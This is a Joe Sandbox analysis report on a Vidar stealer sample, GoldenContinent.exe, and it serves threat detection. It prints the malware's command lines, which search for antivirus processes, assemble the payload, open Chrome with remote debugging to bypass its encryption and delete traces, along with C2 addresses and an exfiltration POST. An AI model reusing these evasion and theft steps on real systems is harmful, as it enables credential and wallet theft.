Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GoldenContinent.exe

Overview

General Information

Sample name:GoldenContinent.exe
Analysis ID:1579534
MD5:7bc8c8c16081e8d9cebcce0d93bc5f8d
SHA1:948d3349e7fc284fe648098d85ba7341258847f3
SHA256:f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78
Tags:exevidaruser-TannerFilip
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • GoldenContinent.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\GoldenContinent.exe" MD5: 7BC8C8C16081E8D9CEBCCE0D93BC5F8D)
    • cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7432 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7440 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7476 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7484 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7528 cmdline: cmd /c md 523266 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7544 cmdline: findstr /V "landing" Ca MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7560 cmdline: cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Relationship.com (PID: 7576 cmdline: Relationship.com x MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 8008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 6980 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 1888 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7596 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              10.2.Relationship.com.43f0000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Relationship.com x, ParentImage: C:\Users\user\AppData\Local\Temp\523266\Relationship.com, ParentProcessId: 7576, ParentProcessName: Relationship.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8008, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7484, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T22:47:41.987210+010020442471Malware Command and Control Activity Detected94.130.188.57443192.168.2.449742TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T22:47:44.275191+010020518311Malware Command and Control Activity Detected94.130.188.57443192.168.2.449743TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T22:47:41.986571+010020490871A Network Trojan was detected192.168.2.44974294.130.188.57443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T22:47:37.428543+010028593781Malware Command and Control Activity Detected192.168.2.44974094.130.188.57443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: GoldenContinent.exeVirustotal: Detection: 12%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                Source: GoldenContinent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: GoldenContinent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5DC54
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A087
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A1E2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00C5E472
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00C6A570
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C666DC FindFirstFileW,FindNextFileW,FindClose,10_2_00C666DC
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2C622 FindFirstFileExW,10_2_00C2C622
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00C673D4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C67333 FindFirstFileW,FindClose,10_2_00C67333
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\523266\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\523266Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 13MB later: 42MB

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49740 -> 94.130.188.57:443
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 94.130.188.57:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.4:49742
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.4:49743
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
                Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
                Source: unknownTCP traffic detected without corresponding DNS query: 104.18.20.226
                Source: unknownTCP traffic detected without corresponding DNS query: 104.18.20.226
                Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.210
                Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.210
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00C6D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000003.2174234783.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173921409.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173841220.00007810031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 0000000F.00000003.2174234783.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173921409.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173841220.00007810031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: ezaZTimpWHt.ezaZTimpWHt
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: toptek.sbs
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CTJEC2VAAAAIE3W47YMGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
